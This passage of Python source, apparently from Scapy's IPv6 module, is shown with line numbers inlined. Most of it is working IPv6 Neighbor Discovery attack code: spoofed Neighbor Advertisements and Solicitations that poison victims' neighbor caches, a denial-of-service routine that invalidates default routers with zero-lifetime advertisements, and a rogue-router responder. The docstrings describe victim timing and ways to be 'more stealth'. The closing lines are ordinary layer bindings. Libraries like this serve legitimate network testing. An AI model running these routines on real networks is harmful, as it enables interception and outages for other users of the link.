reply_mac: allow specifying a specific source mac address for the reply, 3495 i.e. to prevent the use of the mac address of the interface. This 3496 address will also be used in the Target Link-Layer Address option. 3497 3498 router: by the default (False) the 'R' flag in the NA used for the reply 3499 is not set. If the parameter is set to True, the 'R' flag in the 3500 NA is set, advertising us as a router. 3501 3502 Please, keep the following in mind when using the function: for obvious 3503 reasons (kernel space vs. Python speed), when the target of the address 3504 resolution is on the link, the sender of the NS receives 2 NA messages 3505 in a row, the valid one and our fake one. The second one will overwrite 3506 the information provided by the first one, i.e. the natural latency of 3507 Scapy helps here. 3508 3509 In practice, on a common Ethernet link, the emission of the NA from the 3510 genuine target (kernel stack) usually occurs in the same millisecond as 3511 the receipt of the NS. The NA generated by Scapy6 will usually come after 3512 something 20+ ms. On a usual testbed for instance, this difference is 3513 sufficient to have the first data packet sent from the victim to the 3514 destination before it even receives our fake NA. 3515 """ 3516 3517 def is_request(req, mac_src_filter, tgt_filter): 3518 """ 3519 Check if packet req is a request 3520 """ 3521 3522 # Those simple checks are based on Section 5.4.2 of RFC 4862 3523 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3524 return 0 3525 3526 mac_src = req[Ether].src 3527 if mac_src_filter and mac_src != mac_src_filter: 3528 return 0 3529 3530 # Source must NOT be the unspecified address 3531 if req[IPv6].src == "::": 3532 return 0 3533 3534 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3535 if tgt_filter and tgt != tgt_filter: 3536 return 0 3537 3538 dst = req[IPv6].dst 3539 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 3540 3541 # If this is a real address resolution NS, then the destination 3542 # address of the packet is the link-local solicited node multicast 3543 # address associated with the target of the NS. 3544 # Otherwise, the NS is a NUD related one, i.e. the peer is 3545 # unicasting the NS to check the target is still alive (L2 3546 # information is still in its cache and it is verified) 3547 received_snma = socket.inet_pton(socket.AF_INET6, dst) 3548 expected_snma = in6_getnsma(tgt) 3549 if received_snma != expected_snma: 3550 print("solicited node multicast @ does not match target @!") 3551 return 0 3552 3553 return 1 3554 3555 def reply_callback(req, reply_mac, router, iface): 3556 """ 3557 Callback that reply to a NS with a spoofed NA 3558 """ 3559 3560 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 3561 # send it back. 3562 mac = req[Ether].src 3563 pkt = req[IPv6] 3564 src = pkt.src 3565 tgt = req[ICMPv6ND_NS].tgt 3566 rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src) 3567 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS 3568 3569 # "If the solicitation IP Destination Address is not a multicast 3570 # address, the Target Link-Layer Address option MAY be omitted" 3571 # Given our purpose, we always include it. 3572 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3573 3574 sendp(rep, iface=iface, verbose=0) 3575 3576 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3577 3578 if not iface: 3579 iface = conf.iface 3580 # To prevent sniffing our own traffic 3581 if not reply_mac: 3582 reply_mac = get_if_hwaddr(iface) 3583 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3584 3585 router = (router and 1) or 0 # Value of the R flags in NA 3586 3587 sniff(store=0, 3588 filter=sniff_filter, 3589 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3590 prn=lambda x: reply_callback(x, reply_mac, router, iface), 3591 iface=iface) 3592 3593 3594def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 3595 dst=None, src_mac=None, dst_mac=None, loop=True, 3596 inter=1, iface=None): 3597 """ 3598 The main purpose of this function is to send fake Neighbor Solicitations 3599 messages to a victim, in order to either create a new entry in its neighbor 3600 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 3601 that a node SHOULD create the entry or update an existing one (if it is not 3602 currently performing DAD for the target of the NS). The entry's reachability 3603 state is set to STALE. 3604 3605 The two main parameters of the function are the source link-layer address 3606 (carried by the Source Link-Layer Address option in the NS) and the 3607 source address of the packet. 3608 3609 Unlike some other NDP_Attack_* function, this one is not based on a 3610 stimulus/response model. When called, it sends the same NS packet in loop 3611 every second (the default) 3612 3613 Following arguments can be used to change the format of the packets: 3614 3615 src_lladdr: the MAC address used in the Source Link-Layer Address option 3616 included in the NS packet. This is the address that the peer should 3617 associate in its neighbor cache with the IPv6 source address of the 3618 packet. If None is provided, the mac address of the interface is 3619 used. 3620 3621 src: the IPv6 address used as source of the packet. If None is provided, 3622 an address associated with the emitting interface will be used 3623 (based on the destination address of the packet). 3624 3625 target: the target address of the NS packet. If no value is provided, 3626 a dummy address (2001:db8::1) is used. The value of the target 3627 has a direct impact on the destination address of the packet if it 3628 is not overridden. By default, the solicited-node multicast address 3629 associated with the target is used as destination address of the 3630 packet. Consider specifying a specific destination address if you 3631 intend to use a target address different than the one of the victim. 3632 3633 dst: The destination address of the NS. By default, the solicited node 3634 multicast address associated with the target address (see previous 3635 parameter) is used if no specific value is provided. The victim 3636 is not expected to check the destination address of the packet, 3637 so using a multicast address like ff02::1 should work if you want 3638 the attack to target all hosts on the link. On the contrary, if 3639 you want to be more stealth, you should provide the target address 3640 for this parameter in order for the packet to be sent only to the 3641 victim. 3642 3643 src_mac: the MAC address used as source of the packet. By default, this 3644 is the address of the interface. If you want to be more stealth, 3645 feel free to use something else. Note that this address is not the 3646 that the victim will use to populate its neighbor cache. 3647 3648 dst_mac: The MAC address used as destination address of the packet. If 3649 the IPv6 destination address is multicast (all-nodes, solicited 3650 node, ...), it will be computed. If the destination address is 3651 unicast, a neighbor solicitation will be performed to get the 3652 associated address. If you want the attack to be stealth, you 3653 can provide the MAC address using this parameter. 3654 3655 loop: By default, this parameter is True, indicating that NS packets 3656 will be sent in loop, separated by 'inter' seconds (see below). 3657 When set to False, a single packet is sent. 3658 3659 inter: When loop parameter is True (the default), this parameter provides 3660 the interval in seconds used for sending NS packets. 3661 3662 iface: to force the sending interface. 3663 """ 3664 3665 if not iface: 3666 iface = conf.iface 3667 3668 # Use provided MAC address as source link-layer address option 3669 # or the MAC address of the interface if none is provided. 3670 if not src_lladdr: 3671 src_lladdr = get_if_hwaddr(iface) 3672 3673 # Prepare packets parameters 3674 ether_params = {} 3675 if src_mac: 3676 ether_params["src"] = src_mac 3677 3678 if dst_mac: 3679 ether_params["dst"] = dst_mac 3680 3681 ipv6_params = {} 3682 if src: 3683 ipv6_params["src"] = src 3684 if dst: 3685 ipv6_params["dst"] = dst 3686 else: 3687 # Compute the solicited-node multicast address 3688 # associated with the target address. 3689 tmp = inet_ntop(socket.AF_INET6, 3690 in6_getnsma(inet_pton(socket.AF_INET6, target))) 3691 ipv6_params["dst"] = tmp 3692 3693 pkt = Ether(**ether_params) 3694 pkt /= IPv6(**ipv6_params) 3695 pkt /= ICMPv6ND_NS(tgt=target) 3696 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 3697 3698 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 3699 3700 3701def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 3702 ip_src_filter=None, reply_mac=None, 3703 tgt_mac=None): 3704 """ 3705 The purpose of the function is to monitor incoming RA messages 3706 sent by default routers (RA with a non-zero Router Lifetime values) 3707 and invalidate them by immediately replying with fake RA messages 3708 advertising a zero Router Lifetime value. 3709 3710 The result on receivers is that the router is immediately invalidated, 3711 i.e. the associated entry is discarded from the default router list 3712 and destination cache is updated to reflect the change. 3713 3714 By default, the function considers all RA messages with a non-zero 3715 Router Lifetime value but provides configuration knobs to allow 3716 filtering RA sent by specific routers (Ethernet source address). 3717 With regard to emission, the multicast all-nodes address is used 3718 by default but a specific target can be used, in order for the DoS to 3719 apply only to a specific host. 3720 3721 More precisely, following arguments can be used to change the behavior: 3722 3723 iface: a specific interface (e.g. "eth0") of the system on which the 3724 DoS should be launched. If None is provided conf.iface is used. 3725 3726 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3727 Only RA messages received from this source will trigger replies. 3728 If other default routers advertised their presence on the link, 3729 their clients will not be impacted by the attack. The default 3730 value is None: the DoS is not limited to a specific mac address. 3731 3732 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 3733 on. Only RA messages received from this source address will trigger 3734 replies. If other default routers advertised their presence on the 3735 link, their clients will not be impacted by the attack. The default 3736 value is None: the DoS is not limited to a specific IPv6 source 3737 address. 3738 3739 reply_mac: allow specifying a specific source mac address for the reply, 3740 i.e. to prevent the use of the mac address of the interface. 3741 3742 tgt_mac: allow limiting the effect of the DoS to a specific host, 3743 by sending the "invalidating RA" only to its mac address. 3744 """ 3745 3746 def is_request(req, mac_src_filter, ip_src_filter): 3747 """ 3748 Check if packet req is a request 3749 """ 3750 3751 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 3752 return 0 3753 3754 mac_src = req[Ether].src 3755 if mac_src_filter and mac_src != mac_src_filter: 3756 return 0 3757 3758 ip_src = req[IPv6].src 3759 if ip_src_filter and ip_src != ip_src_filter: 3760 return 0 3761 3762 # Check if this is an advertisement for a Default Router 3763 # by looking at Router Lifetime value 3764 if req[ICMPv6ND_RA].routerlifetime == 0: 3765 return 0 3766 3767 return 1 3768 3769 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 3770 """ 3771 Callback that sends an RA with a 0 lifetime 3772 """ 3773 3774 # Let's build a reply and send it 3775 3776 src = req[IPv6].src 3777 3778 # Prepare packets parameters 3779 ether_params = {} 3780 if reply_mac: 3781 ether_params["src"] = reply_mac 3782 3783 if tgt_mac: 3784 ether_params["dst"] = tgt_mac 3785 3786 # Basis of fake RA (high pref, zero lifetime) 3787 rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1") 3788 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 3789 3790 # Add it a PIO from the request ... 3791 tmp = req 3792 while ICMPv6NDOptPrefixInfo in tmp: 3793 pio = tmp[ICMPv6NDOptPrefixInfo] 3794 tmp = pio.payload 3795 del(pio.payload) 3796 rep /= pio 3797 3798 # ... and source link layer address option 3799 if ICMPv6NDOptSrcLLAddr in req: 3800 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 3801 else: 3802 mac = req[Ether].src 3803 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 3804 3805 sendp(rep, iface=iface, verbose=0) 3806 3807 print("Fake RA sent with source address %s" % src) 3808 3809 3810 if not iface: 3811 iface = conf.iface 3812 # To prevent sniffing our own traffic 3813 if not reply_mac: 3814 reply_mac = get_if_hwaddr(iface) 3815 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3816 3817 sniff(store=0, 3818 filter=sniff_filter, 3819 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 3820 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 3821 iface=iface) 3822 3823 3824def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 3825 ip_src_filter=None): 3826 """ 3827 The purpose of this function is to send provided RA message at layer 2 3828 (i.e. providing a packet starting with IPv6 will not work) in response 3829 to received RS messages. In the end, the function is a simple wrapper 3830 around sendp() that monitor the link for RS messages. 3831 3832 It is probably better explained with an example: 3833 3834 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 3835 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 3836 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 3837 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 3838 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 3839 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 3840 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 3841 ... 3842 3843 Following arguments can be used to change the behavior: 3844 3845 ra: the RA message to send in response to received RS message. 3846 3847 iface: a specific interface (e.g. "eth0") of the system on which the 3848 DoS should be launched. If none is provided, conf.iface is 3849 used. 3850 3851 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3852 Only RS messages received from this source will trigger a reply. 3853 Note that no changes to provided RA is done which imply that if 3854 you intend to target only the source of the RS using this option, 3855 you will have to set the Ethernet destination address to the same 3856 value in your RA. 3857 The default value for this parameter is None: no filtering on the 3858 source of RS is done. 3859 3860 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 3861 on. Only RS messages received from this source address will trigger 3862 replies. Same comment as for previous argument apply: if you use 3863 the option, you will probably want to set a specific Ethernet 3864 destination address in the RA. 3865 """ 3866 3867 def is_request(req, mac_src_filter, ip_src_filter): 3868 """ 3869 Check if packet req is a request 3870 """ 3871 3872 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 3873 return 0 3874 3875 mac_src = req[Ether].src 3876 if mac_src_filter and mac_src != mac_src_filter: 3877 return 0 3878 3879 ip_src = req[IPv6].src 3880 if ip_src_filter and ip_src != ip_src_filter: 3881 return 0 3882 3883 return 1 3884 3885 def ra_reply_callback(req, iface): 3886 """ 3887 Callback that sends an RA in reply to an RS 3888 """ 3889 3890 src = req[IPv6].src 3891 sendp(ra, iface=iface, verbose=0) 3892 print("Fake RA sent in response to RS from %s" % src) 3893 3894 if not iface: 3895 iface = conf.iface 3896 sniff_filter = "icmp6" 3897 3898 sniff(store=0, 3899 filter=sniff_filter, 3900 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 3901 prn=lambda x: ra_reply_callback(x, iface), 3902 iface=iface) 3903 3904 3905############################################################################# 3906############################################################################# 3907### Layers binding ### 3908############################################################################# 3909############################################################################# 3910 3911conf.l3types.register(ETH_P_IPV6, IPv6) 3912conf.l2types.register(31, IPv6) 3913conf.l2types.register(DLT_IPV6, IPv6) 3914conf.l2types.register(DLT_RAW, _IPv46) 3915conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) 3916 3917bind_layers(Ether, IPv6, type = 0x86dd ) 3918bind_layers(CookedLinux, IPv6, proto = 0x86dd ) 3919bind_layers(GRE, IPv6, proto = 0x86dd ) 3920bind_layers(SNAP, IPv6, code = 0x86dd ) 3921bind_layers(Loopback, IPv6, type = 0x1c ) 3922bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP ) 3923bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP ) 3924bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP ) 3925bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP ) 3926bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 ) 3927bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 ) 3928bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP ) 3929bind_layers(IPv6, GRE, nh = socket.IPPROTO_GRE ) 3930